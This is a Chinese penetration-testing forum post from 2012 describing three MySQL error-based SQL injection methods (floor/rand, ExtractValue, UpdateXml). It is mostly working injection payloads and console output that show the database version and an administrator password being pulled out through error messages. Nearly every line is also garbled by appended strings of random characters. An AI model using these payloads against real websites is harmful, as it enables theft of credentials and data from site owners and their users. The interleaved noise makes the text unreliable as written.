中国网络渗透测试联盟

标题: 关于Mysql注入过程中的三种报错方式 [打印本页]
作者: admin    时间: 2012-12-10 10:28
标题: 关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。* {( z1 l) J: C- `$ Q
实际测试环境:, q* f/ y5 R, W8 a% e. b

% d1 e3 _# y( o) J - D+ a/ s+ A/ j  t/ ?' Y
mysql> show tables;
# x. e8 g9 ?  x/ I+----------------+
9 j) ]! }! I# |: y| Tables_in_test |
) ]2 S7 |9 E: Y: _0 C9 K$ b6 b# `+----------------+$ N) `, T4 H) R1 Q# I& m, O5 ], b
| admin          |
, v! S0 n4 U9 X& E# @: D| article        |5 \; p+ a' ?% B' ?% s- N
+----------------+
# ~6 ^9 }) X) j9 p 3 F) c; }- S1 X4 E/ j& E. q
8 L0 F+ P: R9 o( h; c: a- x3 b& c) s

% \, ~/ u- H) g  V0 \! h& ymysql> describe admin;
8 e' D% B; _  V2 Z/ l. L8 t+-------+------------------+------+-----+---------+----------------+! f# L% e/ }4 T: F4 R
| Field | Type             | Null | Key | Default | Extra          |4 g5 x8 f  X+ `. |$ q9 g
+-------+------------------+------+-----+---------+----------------+1 y5 _- c8 l: d* V4 j& A$ H9 W  B
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |# M0 t9 F8 B4 x
| user  | varchar(50)      | NO   |     | NULL    |                |" \/ ^5 B6 |0 B$ q" B- K
| pass  | varchar(50)      | NO   |     | NULL    |                |
0 G/ R2 y8 [3 k* H2 ]+ e; Q& ^+-------+------------------+------+-----+---------+----------------+
" n& O7 r. u  Y5 C5 V+ T9 w
# K: E  D: e/ a3 a! b( l/ F7 T 0 [3 J8 E8 K5 S+ N

1 j7 `9 N! K' \& n2 V0 `mysql> describe article;  p7 U1 R, G& |2 M
+---------+------------------+------+-----+---------+----------------+
6 |7 _; ^* A+ }# n| Field   | Type             | Null | Key | Default | Extra          |
, A; Y8 ]2 O! `% _! i' `' X6 N+---------+------------------+------+-----+---------+----------------+
( w6 R, A5 y0 G" O| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |: g' h3 D8 z, |! x" F
| title   | varchar(50)      | NO   |     | NULL    |                |; S$ S* \( l/ H. {& `
| content | varchar(50)      | NO   |     | NULL    |                |5 O' O2 t) [! Z, \- [" C
+---------+------------------+------+-----+---------+----------------+' Y& q7 u: `) u- k; D" k
1、通过floor报错
  e( t* g  O, b9 Q可以通过如下一些利用代码1 V" f0 O4 \% `% N' w
0 z& r" }% T( O
5 C1 O+ a4 ~7 b% c
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
+ \0 R- c" q' n: K$ Hfrom information_schema.tables group by x)a);
7 N# Z9 M/ d' d # u( A' W1 q" `
) W6 k. @+ v) X. y1 V: s
and (select count(*) from (select 1 union select null union select !1)x
  c% p6 V' y8 [group by concat((select table_name from information_schema.tables limit 1),0 W4 Z! \5 F' O
floor(rand(0)*2)));
* b: D. d* {% T. F' w举例如下:
: l9 E9 ~) }5 D2 e. I首先进行正常查询:8 v( ?4 W( L; J. M  r& ~& K' V

0 }2 z; g$ L: umysql> select * from article where id = 1;1 O- U2 X8 f+ V7 l9 ]
+----+-------+---------+
% D1 \+ h# V. ]5 |! f/ S2 E0 k) }8 u| id | title | content |' J# C; e1 m! b
+----+-------+---------+; Z  F4 e% _% z* ?6 ?
|  1 | test  | do it   |
3 f9 X3 h) q' ^* W9 S4 g$ r2 T# d2 ]4 A+----+-------+---------+1 c$ ?7 B: p7 ~7 k$ X6 }8 i- p
假如id输入存在注入的话,可以通过如下语句进行报错。
0 _; T& n( e% W1 @' A6 _. i
  ^9 W+ ~5 C* L6 F  Z
) A; S* M7 [& L- Cmysql> select * from article where id = 1 and (select 1 from
2 C2 M8 {! q7 a2 F/ t) V6 S- G(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 g4 ?2 Q5 t" W6 Z) T& \ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
2 o6 u# C" c$ Q$ g' n7 Z: i可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。% x# ^8 w9 Z- M$ |2 J2 m
例如我们需要查询管理员用户名和密码:
2 s" @0 J0 T/ K  ?  U" J" `8 _Method1:9 P7 W' [8 J; n# q
4 A; D8 F  y0 ~; ]

- X/ Q4 h+ p" a3 h) q# v* Xmysql> select * from article where id = 1 and (select 1 from* L" X2 W& x9 {& G! b1 K
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x$ ]; r. e# U* J
from information_schema.tables group by x)a);
2 ^* I* y0 v( |$ OERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'( @9 D3 l  ~" L
Method2:
+ E/ h5 a$ w/ b* z2 Z+ r$ H
, j. A; I( H# `: v. r/ {7 }$ x+ j $ i7 ]% ?  K% r- w0 S
mysql> select * from article where id = 1 and (select count(*)
* M: \& f$ k( e4 _$ J2 U8 A9 Tfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),( {- F# l4 s9 m4 \
floor(rand(0)*2)));6 s% w, a4 Z* y& g
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'/ o* N! r7 z* A9 n' R
2、ExtractValue
# @+ }( K8 r: q/ l测试语句如下1 I4 o+ s8 [. i- f- k
* k, s8 l' s5 H# U! m+ @
$ _, W5 e' B+ j5 C7 x
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
' }9 j# g' g! N( M/ q' V7 C实际测试过程* y, ^1 w. h3 E

6 S/ w" T$ ?, \8 [/ p ' {! K9 a8 {. X9 L4 [7 a
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
" @" y6 p' x. K+ C- W(select pass from admin limit 1)));--4 P( \/ D1 Y) b' l$ U; c" j; W
ERROR 1105 (HY000): XPATH syntax error: '\admin888'$ O1 D. {1 t# V2 H
3、UpdateXml
) I9 }3 [+ b, l( Q! D4 W: Z测试语句) T1 q8 `; w0 L4 B, ~
+ }1 w3 E( S' f9 k

( P1 w) t* Z7 N; O% ]$ iand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
2 a. u! I, `! y2 ~' h实际测试过程
, t5 a; j8 M2 r, w# w: D2 c
9 h1 Q- Z% N& P+ e5 ? 6 |6 B, `) L3 p
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,$ W3 v- c! d; n* [9 C5 O4 F5 Z  y
(select pass from admin limit 1),0x5e24),1));
* |( F5 N. P, oERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
0 [0 W# |7 R' L7 Z( {2 \All, thanks foreign guys.
; l6 C5 J1 m. _2 K0 U) g; B  z
2 d2 K8 c# M, M  |) Z* v. v2 Z" ?
/ G1 b5 ~) l! C7 M( O/ Q: e9 m



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2